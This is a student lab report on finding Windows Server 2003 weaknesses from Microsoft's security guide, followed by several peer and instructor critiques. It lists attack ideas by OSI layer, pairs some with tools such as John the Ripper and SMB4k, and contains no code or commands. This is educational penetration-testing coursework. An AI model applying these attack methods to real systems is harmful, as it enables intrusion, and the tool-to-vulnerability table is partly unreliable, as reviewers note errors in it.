Abstract
Within this lab it continues to build upon the previous labs, and this week we discuss on vulnerabilities within systems and using security white pages to gain information about systems. Many of these White pages can be found at the vendor sites, or provided by National Institute of Standards and Technology. Using a variety of tools these vulnerabilities will be tested to exploit them. From the information we will be able to conclude with findings about what was found within the documentation, and what vulnerabilities can be exploited. In addition two tables will be formed with a variety of vulnerabilities and tools that can be categorized in comparison with the OSI seven layer model.
Literature Review
In previous lab exercises we’ve seen how penetration testers can exploit a network through both active and passive reconnaissance of their targets, using data captured or probed from the target’s network to footprint their systems. The data gathered can be used to select tools that can be used to exploit the systems based on preexisting vulnerabilities or to select tools to find vulnerabilities that don’t exist.
In lab three we saw that exploit tools could be the source of additional security risks if they are not properly analyzed by experts so, based on the circumstances, we may need the ability to exploit a network without any tools. Literature such as (Jajodia, Noel, & O’Berry, 2005) and (Aycock & Barker, 2005) show that the best way to defend or attack a system is to have an intimate knowledge and understanding of the components that make up the system and, more importantly, how it’s defended. Jajodaia et al. describe a tool for performing a topological vulnerability analysis based on knowledge of the target system that is being tested. By understanding the components of the system, a tester can determine points of weakness that could be exploited. Aycock and Barker used similar logic in developing their course material for teaching a class on virus writing. By understanding the process and components of writing a virus, the students would be able to develop more effective countermeasures for defending against viruses (p. 153). As students of network penetration testing, we have developed various methods of identifying the components in a target network, in lab three we learned to do this passively. Our previous lab exercises, lab four, analyzed and tested methods of actively probing the target network to discover vulnerabilities, often involving interaction with the target hosts using tools. By applying the principles of knowing and understanding the components of our target networks through analysis of configuration and security documentation we will be able to passively develop an exploit table. In this lab we won’t use any technical tools to discover vulnerabilities in a system, we’ll use the vendor’s own security documentation to identify potential areas of exploitation.
Technical tools have limitations that make their use limited in a penetration testing environment. The tools will often return either too many results for the tester to sort through or, worse yet, identify false positives (Wales, 2003, p. 16) which could waste precious testing time. By eliminating the use of tools altogether or augmenting their output with the knowledge obtained from security documentation and security guides, a tester can either filter results from tool output or, as we see in this lab, narrow the focus of their attack efforts to specific area of the system identified by the documentation as needing special focus.
In order to identify points of weakness in the system from the configuration guides and security documentation, we’ll need to reverse engineer the processes and steps identified in the guides. Reverse engineering is often used against software vulnerability testing as seen in (Jorgensen, 2003) where the authors test how a piece of software, Adobe Acrobat, handles random incoming data streams (pp. 1-2). This process is typically used to exploit programming errors that lead to buffer overflows allowing an attacker to cause the program to fail in an unexpected way and often execute arbitrary code that could allow the attacker to cause the system to fail or gain remote access. Through reverse engineering of how the software handles the incoming data streams, testers can often identify weak points in the system where they can inject their code to cause the desired outcome. Applying this principle to the exercises of lab five, we can identify weak points in a system’s configuration by analyzing the configuration guide and, again, narrowly focus our attack efforts on those areas. Some security guides will even point out the vulnerabilities that exist by default.
Instead of analyzing a piece of software, we will be analyzing documentation for this lab. Configuration and security guides are often provided by vendors to their customers for the purposes of configuring the system according to the vendor’s best practices. While this is useful for the vendor for creating an ideal environment to support, the system configuration can become somewhat homogenized across multiple organizations. If the vendor’s best practices are flawed, they could be exposing their customers to risks. The security guide to be analyzed in this lab is the Windows Server 2003 Security Guide. This guide documents security countermeasures and the “vulnerabilities that they address” (Microsoft, 2006, p. 2). The guide also makes mention of the negative impact that the security countermeasures could have on the performance or usability of the system. One negative impact not mentioned by the guide is the potential risk of following a boilerplate template approach to securing a system. This is exacerbated by providing template files along with the guide for automatically applying the security settings for each of the three security levels. By providing such an easy path to “security” many administrators may simply apply the template without any further testing or research. Administrators may also apply the solution recommended by the guide to mitigate the vulnerability. By doing this, they provide more information to the attacker showing that they’ve identified a vulnerability and dealt with it in a certain way. If the attacker or tester notes that the vulnerability has been fixed a certain way, they may be able to find another way around that strategy that is not mentioned in the security guide. An example of this type of attack is seen in (Jajodia et al., 2005) where the authors show a network of two hosts protected by a firewall. The paper describes an attack method where the attacker gains control of one machine first by noting that the firewall is blocking access to that particular host but not another one. The attacker then first gains control over the machine the traffic is allowed to. Now, behind the firewall, the attacker can execute another exploit against his original desired target (p. 258).
The security guide does stress that the measures need to be evaluated and tested by qualified personnel to ensure that they do not affect operations in their environment. It’s safe to assume that, if the organization has taken the time to apply the security measures in the guide, they have probably not taken the time to test them or find other methods of exploitation that the guide either missed or opened up through their countermeasure. An attacker can use this to their advantage, a tester needs to ensure that his customers are aware of this and that he assists in verifying the correctness of the countermeasures and the completeness of the guide.
Methodology
For this lab exercise we will be reverse engineering the security configuration guide for Windows Server 2003 from Microsoft. The guide consists of thirteen chapters and four appendices that focus on security countermeasures for Windows Server 2003, the vulnerabilities that they address, and the negative impacts that the countermeasures could have on the operation of the system. We will be analyzing each chapter for the vulnerabilities that are present in a standard configuration and the countermeasures proposed. The document describes countermeasures for three different levels of security, legacy client, enterprise client, and specialized security/limited functionality (SSLF.) For the purposes of this exercise we will analyze the countermeasures described for the enterprise client which gives us a good mix of security without the added inconveniences of running in SSLF mode. SSLF mode is often used for instances of running a single application, severely impacting usability and performance. We will take each of the vulnerabilities found in the documentation and classify them based on the OSI layer the countermeasure is meant to protect. Based on the mitigation strategy provided in the guide, we will create a list describing each of the vulnerabilities in further detail along with the countermeasure given for the enterprise client security level.
Each vulnerability will also be classified by their McCumber cube coordinates identifying what would be effected through exploitation of the vulnerability, at what state the data is in when the vulnerability is exploited, and what method is used to exploit the vulnerability (McCumber, 1991, pp. 3-7). Based on the tables of exploit tools generated in labs one, two, and three, we will analyze the vulnerabilities discovered in this lab and attempt to match up tools classified by their OSI layer. This will match vulnerability to exploit tool we hope rather rapidly, something that would be extremely useful for an attacker or a penetration tester. Once the tool has been identified we will run the tool from another system against our Windows Server 2003 virtual machine in our lab environment created in lab one. First the tool will be run against the server with the default security configuration to test the presence of the vulnerability. Secondly, we will implement the countermeasure described in the security guide and run the tool again to determine if the proposed countermeasure sufficiently mitigates the vulnerability.
Findings
The summary table of the findings for the first portion of the exercises, identifying vulnerabilities from the security configuration documentation, is detailed in Figure 1. This table organizes the vulnerabilities discovered by the OSI layer that would be exploited and also provides the McCumber cube coordinates that are attacked through exploitation of the vulnerability. The majority of the vulnerabilities found were in the application and session layers of the OSI model.
Below is a list of the vulnerabilities identified through an analysis of the security configuration guide, a description of each, possible methods of exploitation for some, and a mitigation strategy from the guide if one was provided.
Layer 8
Guess reused password – The countermeasure for this vulnerability would be to enforce a password history, remembering the last 24 passwords according to the security guide and to enforce a minimum password age. A minimum password age requires a user to wait a specified amount of time, one day for enterprise clients, before changing their password so the user cannot cycle through old passwords to reuse one (Microsoft, 2006, p. 38).
Guess old password – The countermeasure for this vulnerability would be to expire the password every 42 days according to the security guide (Microsoft, 2006, p. 38).
Guess the current password – by enforcing a minimum password length and specifying security requirement, it becomes more difficult to guess a user’s password or obtain it through brute-force methods (Microsoft, 2006, pp. 39-40).
Obtain user names through surveillance – Even when a Windows Server 2003 machine is locked or logged off, the screen displays either the currently logged in user or the user name of the last logged in user unless restricted by a policy (Microsoft, 2006, p. 83).
Layer 7
Analyze programs through debuggers – If not restricted, a user could attach a debugger to a process or the kernel providing complete access to the inputs and outputs (Microsoft, 2006, p. 70).
Analyze system performance – By analyzing performance statistics on the system, an attacker could identify processes that would make the best targets for a denial of service or identify anti-virus software to bypass (Microsoft, 2006, p. 74).
Autorun malicious application – An attacker could insert removable media into a running server with a logged in user and the server would automatically execute the code. To defend against this, autorun should be disabled on servers that may not have continuous physical security (Microsoft, 2006, pp. 105-106).
DHCP Denial of Service – An attacker could write a script to exhaust the DHCP pool of all available addresses causing a denial of service for legitimate systems requesting IP addresses (Microsoft, 2006, p. 141).
Enumerate SIDs anonymously – This setting could allow an attacker to anonymously expose the user name of the Administrator account on a member server if enabled. The policy is disabled by default on member servers but is enabled by default on domain controllers (Microsoft, 2006, pp. 45-46).
Execute malicious program from removable media – If access to local removable media is not controlled, an unprivileged user could load removable media containing malicious software that could escalate their privileges or cause a denial of service (Microsoft, 2006, p. 79).
File manipulation – By manipulating files, an attacker could compromise the integrity of the data. Through object access auditing, an administrator could see what particular files or folders are being accessed by individuals that may or may not have permissions to do so (Microsoft, 2006, pp. 58-60, 89-90).
Force logoff when logon hours expire – If disabled, this setting could allow an attacker logged in as somebody else to keep their session open indefinitely.
IIS Directory Traversal Attack – If the files for the websites served by IIS are kept on the same volume as the system files, an attacker could send a specially crafted file request for files outside of the website’s folder, potentially accessing system files (Microsoft, 2006, p. 170).
NTBackup Application Programming Interface (API) privilege abuse – The “Back up files and directories” permission circumvents file and directory permissions when they are accessed through the backup API (Microsoft, 2006, p. 68).
Pagefile manipulation – If the “Create a pagefile” setting is not locked down, an attacker could modify the size of the pagefile resulting in decreased system performance and possibly a denial of service (Microsoft, 2006, p. 69). To clear the contents of the page file to prevent access after a shut down, the system can be configured to zero out the page file at shut down. To bypass this, an attacker with physical access could remove the power from the system (p. 96).
Profile application processes – Through process profiling, an attacker could identify security software running on the server such as anti-virus or
intrusion detection software. If they identify that these are running they could employ countermeasure to bypass them (Microsoft, 2006, p. 74).
Process resource starvation – By manipulating the amount of memory or scheduling time available to a process, an attacker could cause a denial of service against the program. By adjusting the permissions on who is allowed to “adjust memory quotas for a process,” this setting could be restricted to privileged users only (Microsoft, 2006, p. 68). The “increase scheduling priority” setting can be used to restrict the ability of users to increasing the priority of their processes which could result in denial of service for others.
Remote access through Terminal Services – By restricting who is allowed to log in through Terminal Services, the system could be secured against administrators being allowed to log in remotely to make changes to the system. This setting is useful in environments where a terminal server needs to be exposed remotely and the administrator wants to deny any accounts with administrative level privileges from logging in remotely (Microsoft, 2006, p. 68).
Remote shutdown – The “Force shutdown from a remote system” could allow any user with privileges to shut down the system to execute that task remotely causing a denial of service (Microsoft, 2006, p. 72).
Security audit log manipulation – By generating a number of meaningless security events, an attacker could overwrite the contents of a security log if the log is set to overwrite events as needed, thus obfuscating what the attacker did. The ability to generate security audits can be controlled through the “Generate security audits” setting (Microsoft, 2006, p. 72)
System time manipulation – By manipulating the system time an attacker could obfuscate their attacks. If the system time is altered, events won’t be timestamped properly making it difficult for investigators to determine when the attacker’s activities were performed. A secondary effect of exploiting this vulnerability would be a denial of service for Kerberos tickets as they are time sensitive (Microsoft, 2006, p. 68).
Layer 6
Account manipulation – By creating accounts or manipulating privileges on existing accounts, an attacker could gain control over a system. By auditing account management events, both successes and failures, an administrator could be alerted to suspicious activity (Microsoft, 2006, p. 55).
Brute force current password – By attempting to log in to an account multiple times, an exploit tool could attempt to log in to an account with all possible eight character non case-sensitive alphanumeric passwords in about 59 hours at 1,000,000 attempts per second. Account lockout drastically increases this time period by locking out the account after a set number of unsuccessful attempts and resetting the lockout status either administratively or after a set number of minutes (Microsoft, 2006, p. 42). Auditing account logon events creates an audit trail to follow, particularly failures audits to identify accounts that may be subject to this attack (p. 54). In addition to user accounts, domain computers also have passwords that are automatically renewed periodically. If the machine account is not allowed to change its password through a policy setting, an attacker could discover this password through methods described above and function at the level of the machine on the network (p. 81). Older versions of Windows or current versions configured to support older versions may have passwords stored as LAN Manager hashes which are easier to decrypt (p. 93). In order to mitigate brute forcing of the default “Administrator” account, the account should be renamed to something difficult to guess. While this will make determining the account’s username difficult, the Security Identifier (SID) of the account is the same across all versions of Windows and is well-known (p. 133).
Decrypt the password – Windows Server 2003 contains an option, turned off by default, to store passwords using reversible encryption allowing an administrator, or attacker, to decrypt all stored passwords on the system. The guide recommends ensuring this is disabled (Microsoft, 2006, p. 41).
Obtain cached passwords from system – Unless restricted, a Windows machine caches passwords for clients that have logged in previously. Even if a machine is taken offsite, these passwords are subject to decryption or discovery through brute force methods (Microsoft, 2006, p. 84). To restrict the ability of machines taken off site to be unlocked, the “Require domain controller authentication to unlock workstation” setting could be enforced (p. 84).
Privilege escalation or password bypass through physical access – By restricting who is allowed to log in locally at the console, a system could be secured against someone who has direct physical access (Microsoft, 2006, p. 68).
Privilege escalation through assuming another user’s identity – The “Act as part of the operating system” setting in Windows Server 2003 allows a process to assume a user’s identity, if that user is privileged, the process could operate at that user’s permissions level and alter system settings (Microsoft, 2006, p. 67).
Privilege escalation through object creation – By not restricting the ability to create token, global, or permanent shared objects in the system, an attacker with any level of access could gain access to all local resources, access other sessions, or share out system resources (Microsoft, 2006, pp. 69-70).
Layer 5
Access SMB/CIFS shares over the network – By default in Windows Server 2003, the Everyone group has access to SMB shares, while this does not include Anonymous users or guest accounts, anyone with an account, even unprivileged accounts, on the system could see the shares (Microsoft, 2006, p. 67).
SMB Session Hijacking – If an attacker hijacks a user’s SMB session and that user is restricted based on logon ours, if this setting isn’t enabled, the attacker could keep the hijacked session up indefinitely (Microsoft, 2006, p. 45).
Layer 4
TCP Denial of Service – Windows Server 2003 contains registry keysto assist defending against a SYN flood attack that are not enabled by default, TcpMaxConnectResponseRetransmissions and SynAttackProtect (Microsoft, 2006, p. 103).
Layer 3
Monitor unencrypted network communications – By default all network communications are unencrypted and subject to monitoring through active or passive reconnaissance methods discussed in labs two and three. Settings and policies can be applied to enable encryption when requested or require encryption for all network communications (Microsoft, 2006, pp. 80-81).
Layer 2
Delete system volumes or partitions – Volume maintenance tasks should only be run by administrators, if this right were to be allowed to non-admins, they could cause a denial of service (Microsoft, 2006, p. 74).
Load malicious drivers – System drivers run at very high privilege. If a user runs a driver containing malicious code, the system could be compromised. Restricting who can load drivers will reduce the amount of users that could potentially compromise the system (Microsoft, 2006, pp. 72-73). This vulnerability can be further controlled through restricting the ability of those with permissions to install drivers to loading only digitally signed drivers (p. 79).
Layer 1
Shut down the system – The ability for logged in users to shut the system can be controlled through settings. Physical access to the server needs to be strictly controlled, anyone with access to the system could shut it down resulting in a denial of service (Microsoft, 2006, p. 74).
In Figure 2 we analyzed the vulnerabilities discovered and matched those with a corresponding exploit tool found in labs one, two, and three that we believed would exploit the vulnerability. Using the various tools from within backtrack we were able to test some of the exploits found within Windows Server 2003. Without hardening the system tools can be use to run attacks against these exploits. Using John the ripper it allows the user running the program to gain user and password information. This can then be further used for other attacks that require username and password for a system. Then using SMB4k we where able to gain access to the Windows 2003 Server. It gave a scan of the network and allowed the viewing of system files. Using this tool against Windows XP did not work the same due to the firewall being in place which denied access. This shows that if an attack needs information to run an attack they can run additional attacks to prepare and gain the required information.
Issues
Our initial approach to analyzing the guide was to split it up by chapter to distribute the workload between the team members. After the first night of work we determined that the bulk of the security guidance was found in the earlier chapters of the document. Good communication was a key factor in figuring this out early and we learned not to treat these guides as simple ordered list.
Conclusion
This lab was an eye opener. As IT practitioners we often refer to these guides for information on configuring a system or for information on implementing a particular security control. The literature review showed us how these security guides are a risk in themselves by promoting a standard security configuration, suggesting how to choose passwords, or providing pre-configured security template files, all of which homogenize the security of not just the systems in one organization but potentially across many organizations utilizing the operating system, software, or hardware described in the guide. Through our analysis of the guide we chose, we were quickly able to identify vulnerabilities in the system and choose methods for exploitation. The research also pointed out that by relying solely on a document such as this, a responsible system administrator or penetration tester still needs to ensure the completeness of what the guide covers and the correctness of the countermeasures employed. Security guides are only that, guides. While they are a good start, they are not a “one stop shop” for implementing security in a system.
Figure 1
OSI Layer |
Vulnerability |
McCumber Coordinates |
Layer 8 – People |
Guess reused password, guess old password, guess the current password, obtain user names through surveillance, |
Confidentiality, Storage, People, |
Layer 7 – Application |
Autorun malicious application, Enumerate SIDs, Execute malicious program from removable media, Force logoff when logon hours expire, IIS Directory Traversal Attack, NTBackup API privilege abuse, Pagefile manipulation, Remote access through terminal services |
Confidentiality, Storage, Technology |
|
Analyze programs through debuggers, analyze system performance, profile application processes, |
Confidentiality, Processing, Technology |
|
File manipulation, system time manipulation, security audit log manipulation, |
Integrity, Storage, Technology |
|
Process resource starvation, remote shutdown, |
Availability, Processing, Technology |
|
DHCP Denial of Service |
Availability, Transmission, Technology |
Layer 6 – Presentation |
account manipulation, brute force current password, Decrypt the password, obtain cached passwords from system, privilege escalation or password bypass through physical access, privilege escalation through object creation, |
Confidentiality, Storage, Technology |
|
Privilege escalation through assuming another user’s identity |
Confidentiality, Processing, Technology |
Layer 5 – Session |
Access, SMB/CIFS shares over the network, SMB session hijacking |
Confidentiality, Storage, Technology |
Layer 4 – Transport |
TCP Denial of Service |
Availability, Transmission, Technology |
Layer 3 – Network |
Monitor unencrypted network communications |
Confidentiality, Transmission, Technology |
Layer 2 – Data Link |
Load malicious drivers |
Confidentiality, Storage, Technology |
|
Delete system volumes or partitions |
Availability, Storage, Technology |
Layer 1 – Physical |
Shutdown the system |
Availability, processing, technology |
Figure 2
OSI Layer |
Vulnerability |
Exploit Tool |
Layer 8 – People |
Guess/discover old password |
L0pthcrack, John the Ripper |
Layer 7 – Application |
Enumerate SIDs |
Oracle SID Enumeration |
Layer 6 – Presentation | Brute force current password |
L0pthcrack, John the Ripper |
Layer 5 – Session |
SMB Session Hijacking |
SMB4k |
Layer 4 – Transport | TCP Denial of Service | tcptraceroute |
Layer 3 – Network |
Gather un-encrypted data |
Wireshark |
Layer 2 – Datalink |
Load malicious drivers/updates |
btscanner |
Layer 1 – Physical |
Confidentiality against the transmission between networks at the fiber or Ethernet cables/connections |
wiretap |
Works Cited
Aycock, J., & Barker, K. (2005). Viruses 101. Paper presented at the Proceedings of the 36th SIGCSE Technical Symposium on Computer Science Education.
Jajodia, S., Noel, S., & O’Berry, B. (2005). Topological Analysis of Network Attack Vulnerability. In Managing Cyber Threats (pp. 247-266).
Jorgensen, A. A. (2003). Testing with Hostile Data Streams. SIGSOFT Software Engineering Notes, 28(2), 9.
McCumber, J. R. (1991, October, 1991). Information Systems Security: A Comprehensive Model. Paper presented at the 14th National Computer Security Conference.
Microsoft. (2006). Windows Server 2003 Security Guide. Retrieved July 6, 2009, from http://checklists.nist.gov/chklst_detail.cfm?config_id=71
Wales, E. (2003). Vulnerability Assessment Tools. Network Security, 2003, 15-17.
This abstract has a very weak beginning to it. The abstract mentions that it builds onto the other labs, but does not explain how. The rest of the abstract is devoted to talking about how ether vendor white pages or NIST documents could be used to gain information about a system. They also mention that they will be examining tools that can be used to exploit the vulnerabilities that are uncovered by reverse engineering the documents described above. This group, and others, failed to mention that part of the lab is examining security patches and service packs. I believe that the lab was talking about finding tools to exploit the vulnerabilities that the security patches and service packs were trying to fix. The group starts their literature review off by providing a good explanation of how this lab ties into the rest of the course. This section could have easily been included in the abstract to help explain this lab. The group does a very good job in explaining the purpose of this lab in the literature review using all the articles given in this lab. The group does not explain each of the articles individually very well though. They do a great job in explaining how each article relates to the current lab, but they do not explain anything about the methodology, theme, or research done on the articles. I like how the group had a very good idea behind this lab and the articles involved, but they could have added some about each of the articles details to make the literature review complete. The first part of this group’s methodology described the document that they were going to use in this lab. They mention that they are going to examine this document from the enterprise client view instead of ether the legacy client or the specialized security/limited functionality. Next in the methodology the group steps through how they are going to accomplish each of the tasks given in the lab. Like mentioned above this group missed the section examining the security patches and service packs applied to the operating systems and the tools that could be used to exploit the vulnerabilities that the patches and service packs fix. The group could have gone into more detail on how they classified each of the vulnerabilities in the document. In the findings of the lab the group starts off by explaining the table that was developed from the examination of the chosen document. The group briefly explains the patterns they found in creating the table. The next part of the results showed a breakdown of all the vulnerabilities found in the document, possible methods of exploitation for some, and a mitigation strategy from the document. At the end of the results the group discussed the tools they found that could be matched up to each of the vulnerabilities found in the first part of the lab. The group discusses briefly some of the results of doing tests using these tools. When I examined the table that was created I was disappointed. The table did not show a complete list of vulnerabilities. This list could have included any security policies that were changed when hardening a computer along with many more vulnerabilities. The group could have examined securing a system better and included a lot more. This also pertains to the table with the tools in it. The group then explains that they had issues with trying to split up the work between them. They found out this did not work as well as they planned. The group does do a very nice job of concluding the lab. They talk about what they learned by doing this lab. They mentioned that the documents that are used to secure a system could be used to find weaknesses in another. They do make a very good point in the end that these security documents are just guides and should not be looked at a “one stop shop” for implementing security in a system.
Team five’s report was fairly solid, but suffered from an awkward abstract and missing details. In the end, I’m not sure if they got the full benefit of either the experiment its self or the assigned literature.
The group’s abstract is so full of grammatical errors that I stopped reading this lab and came back to it after reading another. It’s puzzling since this problem does not persist into the remainder of the document. Please proof read everything.
The team stretches hard and far in order to relate the literature back to the lab. In the process of doing so, they make some erroneous statements. I see what you’re saying about Jajodia et al. but you’re reaching when you say Aycock and Barker talk about defense of a system. In fact, part of what they teach is the opposite. They teach the malicious code in order to teach defense against it, hence the controversy. I’m not certain that what Jorgensen did can be classified as reverse engineering, strictly speaking. It looked more like data injection to me. I would rather see more discussion of the content of the article, and evaluation of its worth. What is Wales really talking about? What does the motivation appear to be? Is there value to Aycock and Barker’s controversial course content? What is Jorgensen doing? Does it stand up to academic evaluation? Is there something wrong with Jajodia et al.’s methodology? By the way, you missed an article.
he team’s methods section is complete. A bit more detail would have helped make it even clearer. What does the test environment look like? How will you test the tools? How do you know which OSI layer to use?
Your findings appear to be thorough. Why do you think that the majority of the vulnerabilities are found in the sixth and seventh layers? Was this expected? Your proofs of concept tests were weak. Be as specific as possible. What actually happened? There really needs to be a separate description of each test, the procedure and the results. What about updates and security roll-ups? How do they affect the system? Are they good for the attacker, the defender, or both?
In the conclusion, the team states that the literature review demonstrated to them that security guides are a risk. I’m not sure how you got that from the literature. While I agree that a security guide should never be followed blindly, and that IT professionals should use ample measures of caution and common sense to build resiliency into a system, I think there may even be something better in this lab. What is the value of the security guide to the penetration tester? The group discusses reverse engineering earlier in the document. What is the value in doing so with the security documents?
The first item with this lab report is the wording in the abstract, for example the first sentence “Within this lab it continues to build upon the previous labs, and this week we discuss on vulnerabilities within systems and using security white pages to gain information about systems”. The wording in the abstract made it very hard to read and to understand exactly what they were trying to convey. The team had a nice little introduction paragraph in their abstract, tying in the previous lab experiments. This is good because it shows that they understand that each lab is building on the previous ones. It was interesting that this team is the only team to incorporate their security document into their literature review. The team does a decent job in making a cohesive literature review, and making everything flow together. Unfortunately not all of the required questions were answered. Their literature was much longer than week’s was, making in over the required length. In the last paragraph the team talks about how making the changes in the security document is a necessary step to take. Are we ever really secure after updating and patching? Or do we get to a point of security in our operating system, and then, bam, a new OS comes out and we have to start the entire process again? I would like a team to have talked about the redundancy in what we do with our operating systems. I feel that it is a continuous circle, we patch to fix problems, more problems are then found, then we patch, and it just doesn’t ever end.
This team, like many others, uses the future tense in their methodology section. By time the methodology section is written, the lab should have already been done, it is in the past. In order for someone to duplicate the experiment performed by the team, the team should write about what they did and anything that changed during the process, not what they will do. The team does mention where most of the vulnerabilities are found in the OSI 7 layer model, or at least in their opinion, where they are found, but never go into detail as to why this pattern occurs. This team had the shortest tables of any of the other groups. Was does this mean? Was their document of choice not long enough, or did they omit many items because of what the changes were and decided that they were not needed? More discussion is needed in their findings to explain their results. This team was one of the few teams that actually looked up the year that their articles were publicized, instead of putting n.d. This team was the only one that after stating their issues, what they did to resolve them. Good job on doing that. Overall the team needs more cohesion, after reading now 5 lab reports from them; it is still obvious that different people wrote different parts of the lab report.
Team 5’s abstract was decent but their description was hard to relate to. The writing was hard to read and to understand exactly what they were trying to convey. The team did a nice job with their introduction in that they tied this lit review back to previous labs. This was good because it shows an understanding that this course has been set up for each lab to build upon the previous lab. The team did a good job of writing a cohesive literature review; however, not all the questions were answered.
Team 5’s methods section is somewhat complete. Additional information would have helped make it better for me to understand.
The team mentions that most of the vulnerabilities are found in the OSI 7 layer model, but gives little detail as to why this occurred.
In their conclusion team 5 does a nice job of talking about what they learned from the lab and mentioned that the documents used to secure a system could be used to find weaknesses in other systems. They do make a very good point in the end that these security documents are just guides and should be used with caution.
Team five has presented a well constructed and reasonably thorough lab write-up. It was interesting that this team included their chosen guide in the literature review: a unique approach. The ‘Methodology’ section for the most part left few questions as to how the exercise was accomplished. I found the ‘Findings’ section nicely done, with descriptions of vulnerabilities and layer level selections to well chosen.
With these positive points in mind, more than a few areas which could benefit from improvement exist in this team’s report. Foremost, the literature review appeared lacking in some regards. I found that very little of each article was actually discussed. For the most part, a single concept was pulled from each article, and then tied in some way to the lab exercise. I believe this made for a discussion with almost no depth, further limited by the large amount of attention given to the team’s security document within this section. It would have made more sense to skip the review of the security document here (as it is being examined at length in the ‘entire’ rest of the lab exercise) and to delve into the other articles in more depth.
Although a ‘second run’ of attack tools (a before and after approach) was mentioned in the ‘Methodology’ section, I saw no indication present anywhere within the document that this was actually done. It also appeared that some methodology was likely contained within the ‘Results’ section, as the very last portion of this section surprises the reader with a fair amount of information regarding ‘how’ a test was being conducted. Additionally, I was left to wonder why exactly a Windows XP host was also tested in this section, as this team’s entire document is concerned with Server 2003: this ‘XP’ test seemed spurious with regard to the stated goal of the exercise. It would have improved this teams report if a more detailed description of the tests being done was included in the ‘Methodology’ section.
Furthermore, while I found this team’s discussion of good quality with respect to the change issues, somehow, the tables appeared lacking in my eyes. Rather than double listing information discussed in the results section again into a table, it might have been better to devise some way to provide all the information in ‘one’ comprehensive listing. Additionally, the actual ‘exploit’ tool list was quite short. This could have been forgiven if some new, rare, or unique tools were presented here, but this was not the case: all the tools appear of a generic nature, with no ‘specific’ vulnerabilities addressed. It seems likely that in a typical penetration testing situation, all of these tools would be tried as normal procedure: so then what of worth was gained from reverse engineering the security document?
Finally, it seems odd that the same tools used in OSI layer six of this teams table should also appear in layer eight, the ‘People’ layer. Should not the eighth layer rely on non-technology ‘people’ tools? How would you propose to use ‘John the Ripper’ against passwords stored in people’s heads? I believe the inclusion of such tools in this layer to be an error on this team’s part.
Over all, team five’s lab report was well written. I just found a few instances where the voice ranged from a past tense, which is required by APA5 to a present voice. Try to keep the voice unified.
Team five’s abstract gave a somewhat general overview of what was accomplished in the laboratory assignment. The team did not mention what operating system or what specific document was to be used.
In the literature review section, team five gave a justification for finding vulnerabilities without tools when they stated “In lab three we saw that exploit tools could be the source of additional security risks if they are not properly analyzed by experts so, based on the circumstances, we may need the ability to exploit a network without any tools.”The team further emphasized their point by stating “Technical tools have limitations that make their use limited in a penetration testing environment. The tools will often return either too many results for the tester to sort through or, worse yet, identify false positives (Wales, 2003, p. 16) which could waste precious testing time. “Besides giving summaries of the different articles and relating them to each other and this laboratory assignment as well as other assignments of the past, the group also identified the document that they analyzed, which was the Windows Server 2003 Security Guide.
In the methodology section, group five further described the recommendation guide that they analyzed by stating “he guide consists of thirteen chapters and four appendices that focus on security countermeasures for Windows Server 2003, the vulnerabilities that they address, and the negative impacts that the countermeasures could have on the operation of the system. “ Group five used a good strategy for testing vulnerabilities in their Windows Server 2003 virtual machine. The team stated “First the tool will be run against the server with the default security configuration to test the presence of the vulnerability. Secondly, we will implement the countermeasure described in the security guide and run the tool again to determine if the proposed countermeasure sufficiently mitigates the vulnerability.”
In the findings section, group five was one of the few groups to actually describe where most of the tabulated data fell within the OSI model. Team five found that most of the vulnerabilities were found in the application layer and session layer. Team five then described some of the vulnerabilities, which were arranged by what layer they occurred at in the OSI model. When the group described testing and stated that “Using John the ripper it allows the user running the program to gain user and password information”, was the tool able to exploit the system before and after the recommendations were used to harden the team’s Windows Server 2003 virtual machine? The group used the SMB4K tool against their virtual machine, but did not state if the tool worked after the recommendations were implemented. The group also tried to use the SMB4k tool against Windows XP but was not able to get the same results due to the firewall that Service pack 3 had. I wonder if the tool would work in Windows Service pack 0.
In the issues section, the group just described how they changed their strategy for analyzing their document.
In the conclusion section, group five made a good point when they stated “The research also pointed out that by relying solely on a document such as this, a responsible system administrator or penetration tester still needs to ensure the completeness of what the guide covers and the correctness of the countermeasures employed.”
Team 5 begins their lab 5 report by stating that lab 5 builds on the previous labs by discussing the vulnerabilities found within systems by using security white papers to gain information. After the brief abstract they proceed with the literature review. They introduce this section by stating that the previous labs involved gathering information from the networks using active and passive reconnaissance. And, that “The data gathered can be used to select tools that can be used to exploit the systems based on preexisting vulnerabilities or to select tools to find vulnerabilities that don’t exist.” I’m not sure I understand the last part of this sentence. How do you “find vulnerabilities that don’t exist”? Team 5 continues with a conglomeration of the various reading assignment for this week, mixed with discussions of lab 5 and the other laboratory assignments. Team 5 seamed to go into a lot more detail concerning the laboratory assignments in the literature review than they did the reading assignments. I do believe that they touched on (what I believe to be) the common thread that ties the reading assignments and this week’s lab assignment together. A Penetration tester needs to go beyond simply using a tool to scan for open ports or sniff traffic off of the network. It requires knowledge of application and system vulnerabilities, and how these vulnerabilities can be used together to breach the security of a system. I believe Team 5 made a good point that blindly applying security patches without a solid understanding of the system and the vulnerabilities that the patch is designed to protect could cause more problems.
In the methodology section, Team 5 begins by discussing the security documentation that they chose to review for this lab; the Security Configuration Guide for Windows 2003 Server from Microsoft. They discuss the three different levels of security that were presented in the documentation; legacy client, enterprise client, and specialized security/limited functionality (SSLF). They decided to use the enterprise client security level. They identified the vulnerabilities addressed in the documentation and classified them by their location in the OSI Model and McCumber Cube. They will match the vulnerability to the exploit tool, and run the exploit tool against the Windows 2003 Server to test the vulnerability. Next, they will implement the countermeasures that were recommended in the documentation and run the tool again to verify that the countermeasure worked.
Team 5 then begins their findings section with a brief description of the tables that they created which organized the vulnerabilities by OSI Layer and McCumber Cube coordinates. Each of the vulnerabilities contain a title and description, making it easy to understand what it intends to accomplish. A nice touch is the addition of the page numbers where the vulnerabilities can be found within the documentation. This would make it easy to locate in the event that further explanation of verification is needed. They then discussed the tools that they used to test the vulnerability of the system, such as John the Ripper and SMB4k.They conclude by restating that there are risks with blindly following the configurations recommended in security documentation. A system administrator should understand the configurations and why they need to be applied.
